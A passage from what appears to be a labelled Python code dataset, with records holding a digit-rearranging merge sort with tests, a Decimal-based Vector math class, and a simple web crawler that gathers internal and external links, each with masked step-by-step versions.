> 1:\n mid = len(arr) // 2\n left = arr[:mid]\n right = arr[mid:]\n merge_sort(left)\n merge_sort(right)\n merge(arr, left, right)\n\n\ndef merge(arr, left, right):\n i = 0\n j = 0\n k = 0\n while i < len(left) and j < len(right):\n if left[i] > right[j]:\n arr[k] = left[i]\n i += 1\n else:\n arr[k] = right[j]\n j += 1\n k += 1\n while i < len(left):\n arr[k] = left[i]\n i += 1\n k += 1\n while j < len(right):\n arr[k] = right[j]\n j += 1\n k += 1\n\n\ndef rearrange_digits(input_list):\n if len(input_list) == 0:\n return []\n merge_sort(input_list)\n first_number = ''\n second_number = ''\n for i in range(0, len(input_list)):\n if i % 2 == 0:\n first_number += str(input_list[i])\n else:\n second_number += str(input_list[i])\n ans = [int(first_number), int(second_number)]\n return ans\n\n\ndef test_function(test_case):\n output = rearrange_digits(test_case[0])\n solution = test_case[1]\n if sum(output) == sum(solution):\n print('Pass')\n else:\n print('Fail')\n\n\ntest_function([[1, 2, 3, 4, 5], [542, 31]])\ntest_function([[4, 6, 2, 5, 9, 8], [964, 852]])\ntest_function([[1, 2, 3], [32, 1]])\ntest_function([[], []])\ntest_function([[9, 9, 9, 9, 9, 9], [999, 999]])\n", "step-5": "# Merge sort is used to sort the elements\ndef merge_sort(arr):\n if len(arr) > 1:\n # Recursion is used to continuously split the array in half.\n mid = len(arr) // 2\n # Using Auxiliary storage here\n left = arr[:mid]\n right = arr[mid:]\n # Traverse the left side of the array\n merge_sort(left)\n # Traverse the right side of the array\n merge_sort(right)\n # Then we merge the left and right side\n merge(arr, left, right)\n\n\ndef merge(arr, left, right):\n i = 0\n j = 0\n k = 0\n # I want the array to be in descending order\n while i < len(left) and j < len(right):\n # We let the array at k be the largest values\n if left[i] > right[j]:\n arr[k] = left[i]\n i += 1\n else:\n arr[k] = right[j]\n j += 1\n k += 1\n\n # One of the two arrays will be left with elements so we dump\n # which ever one still has items in it.\n while i < len(left):\n arr[k] = left[i]\n i += 1\n k += 1\n while j < len(right):\n arr[k] = right[j]\n j += 1\n k += 1\n\n\ndef rearrange_digits(input_list):\n\n if len(input_list) == 0:\n return []\n\n # We sort the list with merge sort\n merge_sort(input_list)\n\n first_number = ''\n second_number = ''\n\n for i in range(0, len(input_list)):\n if i % 2 == 0:\n first_number += str(input_list[i])\n else:\n second_number += str(input_list[i])\n # Convert them to ints and return the two numbers\n ans = [int(first_number), int(second_number)]\n return ans\n\n\ndef test_function(test_case):\n output = rearrange_digits(test_case[0])\n solution = test_case[1]\n if sum(output) == sum(solution):\n print(\"Pass\")\n else:\n print(\"Fail\")\n\n\n# Test case 1:\ntest_function([[1, 2, 3, 4, 5], [542, 31]])\n\n# Test case 2:\ntest_function([[4, 6, 2, 5, 9, 8], [964, 852]])\n\n# Test case 3:\ntest_function([[1, 2, 3], [32, 1]])\n\n# Test case 4:\ntest_function([[], []])\n\n# Test case 5:\ntest_function([[9, 9, 9, 9, 9, 9], [999, 999]])", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
# -*- coding: utf-8 -*- from math import acos, pi, sqrt from decimal import Decimal, getcontext getcontext().prec = 30 class Vector(object): NO_NONZERO_ELTS_FOUND_MSG = 'No nonzero elements found' def __init__(self, coordinates): try: if not coordinates: raise ValueError self.coordinates = tuple([Decimal(x) for x in coordinates]) self.dimension = len(coordinates) except ValueError: raise ValueError('The coordinates must be nonempty') except TypeError: raise TypeError('The coordinates must be an iterable') def __str__(self): return 'Vector: {}'.format(self.coordinates) def __eq__(self, v): return self.coordinates == v.coordinates def iszero(self, tolerance=1e-10): return self.magnitude()<tolerance def plus(self, v): if isinstance(v, Vector): if self.dimension == v.dimension : return Vector([x+y for x, y in zip(self.coordinates, v.coordinates)]) else: raise ValueError('dimension not match.') else: raise TypeError('not a Vector.') def minus(self, v): if isinstance(v, Vector): if self.dimension == v.dimension : return Vector([x-y for x, y in zip(self.coordinates, v.coordinates)]) else: raise ValueError('dimension not match.') else: raise TypeError('not a Vector.') def time_scalar(self, scalar): try: return Vector([Decimal(scalar) * x for x in self.coordinates]) except Exception: raise TypeError('{0} is not a number'.format(scalar)) def magnitude(self): return Decimal(sqrt(sum([x**2 for x in self.coordinates]))) def normalize(self): if self.iszero(): raise ValueError("Can't normalize a zero vector.") else: return self.time_scalar(Decimal(1.0)/self.magnitude()) def dot(self, v): if not isinstance(v, Vector): raise TypeError('not a Vector') else: if self.dimension != v.dimension: raise ValueError('dimension not match.') else: return sum([x*y for x,y in zip(self.coordinates,v.coordinates)]) def angle_with(self, v, in_degree=False, tolerance=1e-10): if not isinstance(v, Vector): raise TypeError('not a Vector') if self.dimension != v.dimension: raise ValueError('dimension not match.') d = self.dot(v)/(self.magnitude()*v.magnitude()) if abs(abs(d)-1) < tolerance: d = 1 if d>0 else -1 elif abs(d)<tolerance: d = 0 if in_degree: return acos(d)/pi*180 else: return acos(d) def is_parallel_to(self, v): if not isinstance(v, Vector): raise TypeError('not a Vector') if self.iszero() or v.iszero(): return True v1 = self.normalize() v2 = v.normalize() return (v1.minus(v2).iszero() or v1.plus(v2).iszero()) def is_parallel_to2(self, v): if not isinstance(v, Vector): raise TypeError('not a Vector') if self.iszero() or v.iszero(): return True n = Vector.first_nonzero_index(self.coordinates) if (v.coordinates[n] == 0): return False if abs(self.coordinates[n])<=abs(v.coordinates[n]): return self.time_scalar(v.coordinates[n] / self.coordinates[n]).minus(v).iszero() else: return v.time_scalar(self.coordinates[n] / v.coordinates[n]).minus(self).iszero() def is_parallel_to3(self, v): if not isinstance(v, Vector): raise TypeError('not a Vector') return (self.iszero() or v.iszero() or self.angle_with(v) == 0 or self.angle_with(v) == pi) def is_orthogonal_to(self, v, tolerance=1e-10): if not isinstance(v, Vector): raise TypeError('not a Vector') return abs(self.dot(v)) < tolerance def component_project_to(self, v): if not isinstance(v, Vector): raise TypeError('not a Vector') return v.normalize().time_scalar(self.dot(v.normalize())) def component_orthogonal_to(self, v): if not isinstance(v, Vector): raise TypeError('not a Vector') return self.minus(self.project(v)) def cross(self, v): if not isinstance(v, Vector): raise TypeError('not a Vector') r = [] if ((self.dimension != v.dimension) or (self.dimension == 1) or (v.dimension == 1)): raise ValueError('dimensions not match') if (self.dimension == v.dimension == 2): z1 = z2 = Decimal(0.0) if (self.dimension == v.dimension == 3): z1 = self.coordinates[2] z2 = v.coordinates[2] r.append(self.coordinates[1]*z2 - v.coordinates[1]*z1) r.append(v.coordinates[0]*z1 - self.coordinates[0]*z2) r.append(self.coordinates[0]*v.coordinates[1] - v.coordinates[0]*self.coordinates[1]) return Vector(r) def parallelogram_area(self, v): if not isinstance(v, Vector): raise TypeError('not a Vector') return self.cross(v).magnitude() @staticmethod def first_nonzero_index(iterable): for k, item in enumerate(iterable): if not MyDecimal(item).is_near_zero(): return k raise Exception(Vector.NO_NONZERO_ELTS_FOUND_MSG) def __getitem__(self, i): return self.coordinates[i] def __setitem__(self, i, x): self.coordinates[i] = x class MyDecimal(Decimal): def is_near_zero(self, eps=1e-10): return abs(self) < eps
normal
{ "blob_id": "1253e052865860a6895f91204a70152745b04652", "index": 8498, "step-1": "<mask token>\n\n\nclass Vector(object):\n <mask token>\n\n def __init__(self, coordinates):\n try:\n if not coordinates:\n raise ValueError\n self.coordinates = tuple([Decimal(x) for x in coordinates])\n self.dimension = len(coordinates)\n except ValueError:\n raise ValueError('The coordinates must be nonempty')\n except TypeError:\n raise TypeError('The coordinates must be an iterable')\n\n def __str__(self):\n return 'Vector: {}'.format(self.coordinates)\n <mask token>\n\n def iszero(self, tolerance=1e-10):\n return self.magnitude() < tolerance\n\n def plus(self, v):\n if isinstance(v, Vector):\n if self.dimension == v.dimension:\n return Vector([(x + y) for x, y in zip(self.coordinates, v.\n coordinates)])\n else:\n raise ValueError('dimension not match.')\n else:\n raise TypeError('not a Vector.')\n <mask token>\n <mask token>\n\n def magnitude(self):\n return Decimal(sqrt(sum([(x ** 2) for x in self.coordinates])))\n <mask token>\n <mask token>\n <mask token>\n\n def is_parallel_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n v1 = self.normalize()\n v2 = v.normalize()\n return v1.minus(v2).iszero() or v1.plus(v2).iszero()\n\n def is_parallel_to2(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n n = Vector.first_nonzero_index(self.coordinates)\n if v.coordinates[n] == 0:\n return False\n if abs(self.coordinates[n]) <= abs(v.coordinates[n]):\n return self.time_scalar(v.coordinates[n] / self.coordinates[n]\n ).minus(v).iszero()\n else:\n return v.time_scalar(self.coordinates[n] / v.coordinates[n]).minus(\n self).iszero()\n\n def is_parallel_to3(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.iszero() or v.iszero() or self.angle_with(v\n ) == 0 or self.angle_with(v) == pi\n\n def is_orthogonal_to(self, v, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return abs(self.dot(v)) < tolerance\n <mask token>\n\n def component_orthogonal_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.minus(self.project(v))\n\n def cross(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n r = []\n if (self.dimension != v.dimension or self.dimension == 1 or v.\n dimension == 1):\n raise ValueError('dimensions not match')\n if self.dimension == v.dimension == 2:\n z1 = z2 = Decimal(0.0)\n if self.dimension == v.dimension == 3:\n z1 = self.coordinates[2]\n z2 = v.coordinates[2]\n r.append(self.coordinates[1] * z2 - v.coordinates[1] * z1)\n r.append(v.coordinates[0] * z1 - self.coordinates[0] * z2)\n r.append(self.coordinates[0] * v.coordinates[1] - v.coordinates[0] *\n self.coordinates[1])\n return Vector(r)\n\n def parallelogram_area(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.cross(v).magnitude()\n <mask token>\n <mask token>\n <mask token>\n\n\nclass MyDecimal(Decimal):\n\n def is_near_zero(self, eps=1e-10):\n return abs(self) < eps\n", "step-2": "<mask token>\n\n\nclass Vector(object):\n <mask token>\n\n def __init__(self, coordinates):\n try:\n if not coordinates:\n raise ValueError\n self.coordinates = tuple([Decimal(x) for x in coordinates])\n self.dimension = len(coordinates)\n except ValueError:\n raise ValueError('The coordinates must be nonempty')\n except TypeError:\n raise TypeError('The coordinates must be an iterable')\n\n def __str__(self):\n return 'Vector: {}'.format(self.coordinates)\n\n def __eq__(self, v):\n return self.coordinates == v.coordinates\n\n def iszero(self, tolerance=1e-10):\n return self.magnitude() < tolerance\n\n def plus(self, v):\n if isinstance(v, Vector):\n if self.dimension == v.dimension:\n return Vector([(x + y) for x, y in zip(self.coordinates, v.\n coordinates)])\n else:\n raise ValueError('dimension not match.')\n else:\n raise TypeError('not a Vector.')\n <mask token>\n <mask token>\n\n def magnitude(self):\n return Decimal(sqrt(sum([(x ** 2) for x in self.coordinates])))\n <mask token>\n <mask token>\n\n def angle_with(self, v, in_degree=False, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.dimension != v.dimension:\n raise ValueError('dimension not match.')\n d = self.dot(v) / (self.magnitude() * v.magnitude())\n if abs(abs(d) - 1) < tolerance:\n d = 1 if d > 0 else -1\n elif abs(d) < tolerance:\n d = 0\n if in_degree:\n return acos(d) / pi * 180\n else:\n return acos(d)\n\n def is_parallel_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n v1 = self.normalize()\n v2 = v.normalize()\n return v1.minus(v2).iszero() or v1.plus(v2).iszero()\n\n def is_parallel_to2(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n n = Vector.first_nonzero_index(self.coordinates)\n if v.coordinates[n] == 0:\n return False\n if abs(self.coordinates[n]) <= abs(v.coordinates[n]):\n return self.time_scalar(v.coordinates[n] / self.coordinates[n]\n ).minus(v).iszero()\n else:\n return v.time_scalar(self.coordinates[n] / v.coordinates[n]).minus(\n self).iszero()\n\n def is_parallel_to3(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.iszero() or v.iszero() or self.angle_with(v\n ) == 0 or self.angle_with(v) == pi\n\n def is_orthogonal_to(self, v, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return abs(self.dot(v)) < tolerance\n <mask token>\n\n def component_orthogonal_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.minus(self.project(v))\n\n def cross(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n r = []\n if (self.dimension != v.dimension or self.dimension == 1 or v.\n dimension == 1):\n raise ValueError('dimensions not match')\n if self.dimension == v.dimension == 2:\n z1 = z2 = Decimal(0.0)\n if self.dimension == v.dimension == 3:\n z1 = self.coordinates[2]\n z2 = v.coordinates[2]\n r.append(self.coordinates[1] * z2 - v.coordinates[1] * z1)\n r.append(v.coordinates[0] * z1 - self.coordinates[0] * z2)\n r.append(self.coordinates[0] * v.coordinates[1] - v.coordinates[0] *\n self.coordinates[1])\n return Vector(r)\n\n def parallelogram_area(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.cross(v).magnitude()\n <mask token>\n <mask token>\n <mask token>\n\n\nclass MyDecimal(Decimal):\n\n def is_near_zero(self, eps=1e-10):\n return abs(self) < eps\n", "step-3": "<mask token>\n\n\nclass Vector(object):\n <mask token>\n\n def __init__(self, coordinates):\n try:\n if not coordinates:\n raise ValueError\n self.coordinates = tuple([Decimal(x) for x in coordinates])\n self.dimension = len(coordinates)\n except ValueError:\n raise ValueError('The coordinates must be nonempty')\n except TypeError:\n raise TypeError('The coordinates must be an iterable')\n\n def __str__(self):\n return 'Vector: {}'.format(self.coordinates)\n\n def __eq__(self, v):\n return self.coordinates == v.coordinates\n\n def iszero(self, tolerance=1e-10):\n return self.magnitude() < tolerance\n\n def plus(self, v):\n if isinstance(v, Vector):\n if self.dimension == v.dimension:\n return Vector([(x + y) for x, y in zip(self.coordinates, v.\n coordinates)])\n else:\n raise ValueError('dimension not match.')\n else:\n raise TypeError('not a Vector.')\n <mask token>\n\n def time_scalar(self, scalar):\n try:\n return Vector([(Decimal(scalar) * x) for x in self.coordinates])\n except Exception:\n raise TypeError('{0} is not a number'.format(scalar))\n\n def magnitude(self):\n return Decimal(sqrt(sum([(x ** 2) for x in self.coordinates])))\n\n def normalize(self):\n if self.iszero():\n raise ValueError(\"Can't normalize a zero vector.\")\n else:\n return self.time_scalar(Decimal(1.0) / self.magnitude())\n\n def dot(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n elif self.dimension != v.dimension:\n raise ValueError('dimension not match.')\n else:\n return sum([(x * y) for x, y in zip(self.coordinates, v.\n coordinates)])\n\n def angle_with(self, v, in_degree=False, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.dimension != v.dimension:\n raise ValueError('dimension not match.')\n d = self.dot(v) / (self.magnitude() * v.magnitude())\n if abs(abs(d) - 1) < tolerance:\n d = 1 if d > 0 else -1\n elif abs(d) < tolerance:\n d = 0\n if in_degree:\n return acos(d) / pi * 180\n else:\n return acos(d)\n\n def is_parallel_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n v1 = self.normalize()\n v2 = v.normalize()\n return v1.minus(v2).iszero() or v1.plus(v2).iszero()\n\n def is_parallel_to2(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n n = Vector.first_nonzero_index(self.coordinates)\n if v.coordinates[n] == 0:\n return False\n if abs(self.coordinates[n]) <= abs(v.coordinates[n]):\n return self.time_scalar(v.coordinates[n] / self.coordinates[n]\n ).minus(v).iszero()\n else:\n return v.time_scalar(self.coordinates[n] / v.coordinates[n]).minus(\n self).iszero()\n\n def is_parallel_to3(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.iszero() or v.iszero() or self.angle_with(v\n ) == 0 or self.angle_with(v) == pi\n\n def is_orthogonal_to(self, v, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return abs(self.dot(v)) < tolerance\n\n def component_project_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return v.normalize().time_scalar(self.dot(v.normalize()))\n\n def component_orthogonal_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.minus(self.project(v))\n\n def cross(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n r = []\n if (self.dimension != v.dimension or self.dimension == 1 or v.\n dimension == 1):\n raise ValueError('dimensions not match')\n if self.dimension == v.dimension == 2:\n z1 = z2 = Decimal(0.0)\n if self.dimension == v.dimension == 3:\n z1 = self.coordinates[2]\n z2 = v.coordinates[2]\n r.append(self.coordinates[1] * z2 - v.coordinates[1] * z1)\n r.append(v.coordinates[0] * z1 - self.coordinates[0] * z2)\n r.append(self.coordinates[0] * v.coordinates[1] - v.coordinates[0] *\n self.coordinates[1])\n return Vector(r)\n\n def parallelogram_area(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.cross(v).magnitude()\n\n @staticmethod\n def first_nonzero_index(iterable):\n for k, item in enumerate(iterable):\n if not MyDecimal(item).is_near_zero():\n return k\n raise Exception(Vector.NO_NONZERO_ELTS_FOUND_MSG)\n\n def __getitem__(self, i):\n return self.coordinates[i]\n <mask token>\n\n\nclass MyDecimal(Decimal):\n\n def is_near_zero(self, eps=1e-10):\n return abs(self) < eps\n", "step-4": "<mask token>\ngetcontext().prec = 30\n\n\nclass Vector(object):\n NO_NONZERO_ELTS_FOUND_MSG = 'No nonzero elements found'\n\n def __init__(self, coordinates):\n try:\n if not coordinates:\n raise ValueError\n self.coordinates = tuple([Decimal(x) for x in coordinates])\n self.dimension = len(coordinates)\n except ValueError:\n raise ValueError('The coordinates must be nonempty')\n except TypeError:\n raise TypeError('The coordinates must be an iterable')\n\n def __str__(self):\n return 'Vector: {}'.format(self.coordinates)\n\n def __eq__(self, v):\n return self.coordinates == v.coordinates\n\n def iszero(self, tolerance=1e-10):\n return self.magnitude() < tolerance\n\n def plus(self, v):\n if isinstance(v, Vector):\n if self.dimension == v.dimension:\n return Vector([(x + y) for x, y in zip(self.coordinates, v.\n coordinates)])\n else:\n raise ValueError('dimension not match.')\n else:\n raise TypeError('not a Vector.')\n\n def minus(self, v):\n if isinstance(v, Vector):\n if self.dimension == v.dimension:\n return Vector([(x - y) for x, y in zip(self.coordinates, v.\n coordinates)])\n else:\n raise ValueError('dimension not match.')\n else:\n raise TypeError('not a Vector.')\n\n def time_scalar(self, scalar):\n try:\n return Vector([(Decimal(scalar) * x) for x in self.coordinates])\n except Exception:\n raise TypeError('{0} is not a number'.format(scalar))\n\n def magnitude(self):\n return Decimal(sqrt(sum([(x ** 2) for x in self.coordinates])))\n\n def normalize(self):\n if self.iszero():\n raise ValueError(\"Can't normalize a zero vector.\")\n else:\n return self.time_scalar(Decimal(1.0) / self.magnitude())\n\n def dot(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n elif self.dimension != v.dimension:\n raise ValueError('dimension not match.')\n else:\n return sum([(x * y) for x, y in zip(self.coordinates, v.\n coordinates)])\n\n def angle_with(self, v, in_degree=False, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.dimension != v.dimension:\n raise ValueError('dimension not match.')\n d = self.dot(v) / (self.magnitude() * v.magnitude())\n if abs(abs(d) - 1) < tolerance:\n d = 1 if d > 0 else -1\n elif abs(d) < tolerance:\n d = 0\n if in_degree:\n return acos(d) / pi * 180\n else:\n return acos(d)\n\n def is_parallel_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n v1 = self.normalize()\n v2 = v.normalize()\n return v1.minus(v2).iszero() or v1.plus(v2).iszero()\n\n def is_parallel_to2(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n n = Vector.first_nonzero_index(self.coordinates)\n if v.coordinates[n] == 0:\n return False\n if abs(self.coordinates[n]) <= abs(v.coordinates[n]):\n return self.time_scalar(v.coordinates[n] / self.coordinates[n]\n ).minus(v).iszero()\n else:\n return v.time_scalar(self.coordinates[n] / v.coordinates[n]).minus(\n self).iszero()\n\n def is_parallel_to3(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.iszero() or v.iszero() or self.angle_with(v\n ) == 0 or self.angle_with(v) == pi\n\n def is_orthogonal_to(self, v, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return abs(self.dot(v)) < tolerance\n\n def component_project_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return v.normalize().time_scalar(self.dot(v.normalize()))\n\n def component_orthogonal_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.minus(self.project(v))\n\n def cross(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n r = []\n if (self.dimension != v.dimension or self.dimension == 1 or v.\n dimension == 1):\n raise ValueError('dimensions not match')\n if self.dimension == v.dimension == 2:\n z1 = z2 = Decimal(0.0)\n if self.dimension == v.dimension == 3:\n z1 = self.coordinates[2]\n z2 = v.coordinates[2]\n r.append(self.coordinates[1] * z2 - v.coordinates[1] * z1)\n r.append(v.coordinates[0] * z1 - self.coordinates[0] * z2)\n r.append(self.coordinates[0] * v.coordinates[1] - v.coordinates[0] *\n self.coordinates[1])\n return Vector(r)\n\n def parallelogram_area(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.cross(v).magnitude()\n\n @staticmethod\n def first_nonzero_index(iterable):\n for k, item in enumerate(iterable):\n if not MyDecimal(item).is_near_zero():\n return k\n raise Exception(Vector.NO_NONZERO_ELTS_FOUND_MSG)\n\n def __getitem__(self, i):\n return self.coordinates[i]\n\n def __setitem__(self, i, x):\n self.coordinates[i] = x\n\n\nclass MyDecimal(Decimal):\n\n def is_near_zero(self, eps=1e-10):\n return abs(self) < eps\n", "step-5": "# -*- coding: utf-8 -*-\n\nfrom math import acos, pi, sqrt\nfrom decimal import Decimal, getcontext\n\ngetcontext().prec = 30\n\nclass Vector(object):\n NO_NONZERO_ELTS_FOUND_MSG = 'No nonzero elements found'\n \n def __init__(self, coordinates):\n try:\n if not coordinates:\n raise ValueError\n self.coordinates = tuple([Decimal(x) for x in coordinates])\n self.dimension = len(coordinates)\n\n except ValueError:\n raise ValueError('The coordinates must be nonempty')\n\n except TypeError:\n raise TypeError('The coordinates must be an iterable')\n\n def __str__(self):\n return 'Vector: {}'.format(self.coordinates)\n\n def __eq__(self, v):\n return self.coordinates == v.coordinates\n \n def iszero(self, tolerance=1e-10):\n return self.magnitude()<tolerance\n \n def plus(self, v):\n if isinstance(v, Vector):\n if self.dimension == v.dimension :\n return Vector([x+y for x, y in zip(self.coordinates, v.coordinates)])\n else:\n raise ValueError('dimension not match.')\n else:\n raise TypeError('not a Vector.')\n\n def minus(self, v):\n if isinstance(v, Vector):\n if self.dimension == v.dimension :\n return Vector([x-y for x, y in zip(self.coordinates, v.coordinates)])\n else:\n raise ValueError('dimension not match.')\n else:\n raise TypeError('not a Vector.')\n\n def time_scalar(self, scalar):\n try:\n return Vector([Decimal(scalar) * x for x in self.coordinates])\n except Exception:\n raise TypeError('{0} is not a number'.format(scalar))\n \n def magnitude(self):\n return Decimal(sqrt(sum([x**2 for x in self.coordinates])))\n \n def normalize(self):\n if self.iszero():\n raise ValueError(\"Can't normalize a zero vector.\")\n else:\n return self.time_scalar(Decimal(1.0)/self.magnitude())\n \n def dot(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n else:\n if self.dimension != v.dimension:\n raise ValueError('dimension not match.')\n else:\n return sum([x*y for x,y in zip(self.coordinates,v.coordinates)]) \n \n def angle_with(self, v, in_degree=False, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.dimension != v.dimension:\n raise ValueError('dimension not match.')\n d = self.dot(v)/(self.magnitude()*v.magnitude())\n if abs(abs(d)-1) < tolerance:\n d = 1 if d>0 else -1\n elif abs(d)<tolerance:\n d = 0\n if in_degree:\n return acos(d)/pi*180\n else:\n return acos(d)\n \n def is_parallel_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n v1 = self.normalize()\n v2 = v.normalize()\n return (v1.minus(v2).iszero() or \n v1.plus(v2).iszero())\n \n def is_parallel_to2(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n n = Vector.first_nonzero_index(self.coordinates)\n if (v.coordinates[n] == 0):\n return False\n if abs(self.coordinates[n])<=abs(v.coordinates[n]):\n return self.time_scalar(v.coordinates[n] / self.coordinates[n]).minus(v).iszero()\n else:\n return v.time_scalar(self.coordinates[n] / v.coordinates[n]).minus(self).iszero()\n \n def is_parallel_to3(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return (self.iszero() or \n v.iszero() or\n self.angle_with(v) == 0 or\n self.angle_with(v) == pi)\n \n def is_orthogonal_to(self, v, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return abs(self.dot(v)) < tolerance\n\n def component_project_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return v.normalize().time_scalar(self.dot(v.normalize()))\n\n def component_orthogonal_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.minus(self.project(v))\n \n def cross(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n r = []\n if ((self.dimension != v.dimension) or\n (self.dimension == 1) or\n (v.dimension == 1)):\n raise ValueError('dimensions not match')\n if (self.dimension == v.dimension == 2):\n z1 = z2 = Decimal(0.0)\n if (self.dimension == v.dimension == 3):\n z1 = self.coordinates[2]\n z2 = v.coordinates[2]\n r.append(self.coordinates[1]*z2 - v.coordinates[1]*z1)\n r.append(v.coordinates[0]*z1 - self.coordinates[0]*z2)\n r.append(self.coordinates[0]*v.coordinates[1] - v.coordinates[0]*self.coordinates[1])\n return Vector(r)\n \n \n def parallelogram_area(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.cross(v).magnitude()\n \n @staticmethod\n def first_nonzero_index(iterable):\n for k, item in enumerate(iterable):\n if not MyDecimal(item).is_near_zero():\n return k\n raise Exception(Vector.NO_NONZERO_ELTS_FOUND_MSG)\n \n def __getitem__(self, i):\n return self.coordinates[i]\n \n def __setitem__(self, i, x):\n self.coordinates[i] = x\n\n \nclass MyDecimal(Decimal):\n def is_near_zero(self, eps=1e-10):\n return abs(self) < eps", "step-ids": [ 15, 17, 23, 27, 29 ] }
[ 15, 17, 23, 27, 29 ]
import requests from urllib.parse import urlparse from bs4 import BeautifulSoup import re import datetime import random pages = set() # Retrieve a list of all Internal links foound on a page. def getInternalLinks(bs, includeUrl): includeUrl = f'{urlparse(includeUrl).scheme}://{urlparse(includeUrl).netloc}' internalLinks = [] # Finds all links thhat begin with a "/" for link in bs.find_all('a', href=re.compile('^(/|.*'+includeUrl+')')): if link.attrs['href'] is not None: if link.attrs['href'] not in internalLinks: if link.attrs['href'].startswith('/'): internalLinks.append(includeUrl+link.attrs['href']) else: internalLinks.append(link.attrs['href']) return internalLinks # Retrieves a list of all external links found on a pagee. def getExternalLinks(bs, excludeUrl): externalLinks = [] # Finds all links that starts with "http" that do # not contain the current URL for link in bs.find_all('a', href=re.compile('^(http|www)((?!'+excludeUrl+').)*$')): if link.attrs['href'] is not None: if link.attrs['href'] not in externalLinks: externalLinks.append(link.attrs['href']) return externalLinks def getRandomExternalLink(startingPage): html = requests.get(startingPage) bs = BeautifulSoup(html.text, 'html.parser') externalLinks = getExternalLinks(bs, urlparse(startingPage).netloc) if len(externalLinks) == 0: print('No external links, looking around the site for one.') domain = f'{urlparse(startingPage).scheme}://{urlparse(startingPage).netloc}' internalLinks = getInternalLinks(bs, domain) return getRandomExternalLink(internalLinks[random.randint(0, len(internalLinks)-1)]) else: return externalLinks[random.randint(0, len(externalLinks)-1)] # Collects a list of all external URLs found on the site allExtLinks = set() allIntLinks = set() def getAllExternalLinks(siteUrl): html = requests.get(siteUrl) domain = f"{urlparse(siteUrl).scheme}://{urlparse(siteUrl).netloc}" bs = BeautifulSoup(html.text, 'html.parser') internalLinks = getInternalLinks(bs, domain) externalLinks = getExternalLinks(bs, domain) for link in externalLinks: if link not in allExtLinks: allExtLinks.add(link) print(link) for link in internalLinks: if link not in allIntLinks: allIntLinks.add(link) getAllExternalLinks(link) def followExternalOnly(startingSite): externalLink = getRandomExternalLink(startingSite) print(f"Random external link is: {externalLink}") followExternalOnly(externalLink)
normal
